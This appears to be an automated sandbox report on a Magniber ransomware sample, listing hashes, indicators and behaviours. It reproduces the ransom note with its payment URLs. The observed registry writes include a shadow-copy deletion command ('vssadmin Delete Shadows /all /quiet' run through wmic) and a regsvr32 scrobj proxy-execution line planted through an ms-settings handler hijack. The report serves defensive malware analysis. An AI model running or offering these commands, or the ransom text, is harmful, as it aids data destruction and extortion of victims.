magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Resubmissions

14-11-2021 16:02

211114-tgx5gadedr 10

14-11-2021 15:51

211114-tak7bsdedn 5

Analysis

max time kernel
149s
max time network
151s
platform
windows10_x64
resource
win10-en-20211104
submitted
14-11-2021 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://0e044ed8a25852801eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://0e044ed8a25852801eltalkfzj.jobsbig.cam/eltalkfzj http://0e044ed8a25852801eltalkfzj.boxgas.icu/eltalkfzj http://0e044ed8a25852801eltalkfzj.sixsees.club/eltalkfzj http://0e044ed8a25852801eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://0e044ed8a25852801eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://0e044ed8a25852801eltalkfzj.jobsbig.cam/eltalkfzj

http://0e044ed8a25852801eltalkfzj.boxgas.icu/eltalkfzj

http://0e044ed8a25852801eltalkfzj.sixsees.club/eltalkfzj

http://0e044ed8a25852801eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2796	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5064	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2948	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2504	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3712	1868	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4812	1868	cmd.exe	85

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\InvokeSave.png => C:\Users\Admin\Pictures\InvokeSave.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\MountDebug.png => C:\Users\Admin\Pictures\MountDebug.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RepairConnect.crw => C:\Users\Admin\Pictures\RepairConnect.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ResolveMeasure.raw => C:\Users\Admin\Pictures\ResolveMeasure.raw.eltalkfzj	sihost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	Process	procid_target
PID 3572 set thread context of 2408	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	31
PID 3572 set thread context of 2424	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	30
PID 3572 set thread context of 2704	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	24
PID 3572 set thread context of 2060	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	12
PID 3572 set thread context of 3460	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	22
PID 3572 set thread context of 3796	3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	20

Drops file in Windows directory 2 IoCs

Processes:

MicrosoftEdge.exe

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
4336	3796	WerFault.exe	20

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeExplorer.EXERuntimeBroker.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exesihost.exetaskhostw.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "006"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "microsoft.microsoftedge_8wekyb3d8bbwe/006"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 79f0e5fcadd1d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
4484	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	Process
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe
4336	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
2060	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

pid	Process
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3572	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WerFault.exeExplorer.EXEWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	4336	WerFault.exe
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeShutdownPrivilege	2060	Explorer.EXE
Token: SeCreatePagefilePrivilege	2060	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	500	WMIC.exe
Token: SeSecurityPrivilege	500	WMIC.exe
Token: SeTakeOwnershipPrivilege	500	WMIC.exe
Token: SeLoadDriverPrivilege	500	WMIC.exe
Token: SeSystemProfilePrivilege	500	WMIC.exe
Token: SeSystemtimePrivilege	500	WMIC.exe
Token: SeProfSingleProcessPrivilege	500	WMIC.exe
Token: SeIncBasePriorityPrivilege	500	WMIC.exe
Token: SeCreatePagefilePrivilege	500	WMIC.exe
Token: SeBackupPrivilege	500	WMIC.exe
Token: SeRestorePrivilege	500	WMIC.exe
Token: SeShutdownPrivilege	500	WMIC.exe
Token: SeDebugPrivilege	500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	500	WMIC.exe
Token: SeRemoteShutdownPrivilege	500	WMIC.exe
Token: SeUndockPrivilege	500	WMIC.exe
Token: SeManageVolumePrivilege	500	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

